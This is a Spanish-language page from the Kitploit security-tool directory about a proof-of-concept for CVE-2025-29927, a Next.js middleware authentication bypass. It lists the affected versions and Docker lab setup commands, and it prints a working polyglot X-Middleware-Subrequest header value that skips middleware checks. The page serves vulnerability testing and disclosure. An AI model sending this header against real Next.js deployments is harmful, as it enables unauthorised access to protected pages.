Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2025-29927-PoC — PoC para CVE-2025-29927: Vulnerabilidad de omisión de middleware de Next.js. Demuestra cómo x-middleware-subrequest puede omitir las comprobaciones de autenticación. Incluye configuración de Docker para pruebas. | Kitploit
Herramientas/GitHubGitHub/alihussainzada/
cve-2025-29927-poc
Autenticación y AutorizaciónAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebSeguridad WebPruebas de Penetración
GitHubalihussainzada/cve-2025-29927-poc

CVE-2025-29927-PoC

PoC para CVE-2025-29927: Vulnerabilidad de omisión de middleware de Next.js. Demuestra cómo x-middleware-subrequest puede omitir las comprobaciones de autenticación. Incluye configuración de Docker para pruebas.

Ver Repositorio
5hace 1 añoAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2025-29927: Vulnerabilidad de Bypass de Middleware en Next.js PoC

Este repositorio demuestra la vulnerabilidad CVE-2025-29927 en Next.js, donde el encabezado interno x-middleware-subrequest puede usarse para eludir las comprobaciones de middleware como la autenticación.

Versiones Afectadas

  • Next.js 15.x < 15.2.3
  • Next.js 14.x < 14.2.25
  • Next.js 13.x < 13.5.9

Pasos para Reproducir

1. Clonar el Repositorio:

root@kitploit:~
git clone https://github.com/alihussainzada/CVE-2025-29927-PoC.git

2. Navegar a la Carpeta del Proyecto:

root@kitploit:~
cd CVE-2025-29927-PoC

3. Generar un Secreto:

root@kitploit:~
openssl rand -base64 32

4. Actualizar el Secreto en el Archivo .env:

root@kitploit:~
NEXTAUTH_SECRET=your_generated_secret

5. Construir y Ejecutar con Docker:

root@kitploit:~
docker build -t nextjs .
docker run -p 3000:3000 --env-file .env nextjs

Prueba de Concepto

Podemos simplificar enormemente la explotación de este problema utilizando un políglota que nos permite cubrir eficazmente los diversos casos potenciales. Logramos esto con el siguiente encabezado HTTP, utilizado para verificar la presencia de un bypass de autenticación:

root@kitploit:~
X-Middleware-Subrequest: src/middleware:nowaf:src/middleware:src/middleware:src/middleware:src/middleware:middleware:middleware:nowaf:middleware:middleware:middleware:pages/_middleware

Redirigir usuarios

Ejemplo de Explotación

Créditos/Fuentes

  • Blog de Next.js sobre CVE-2025-29927
  • Zhero Web Security Research: Next.js y el Middleware Corrupto
  • Assetnote Security Research: Analizando el Bypass de Middleware de Next.js
Descargar herramienta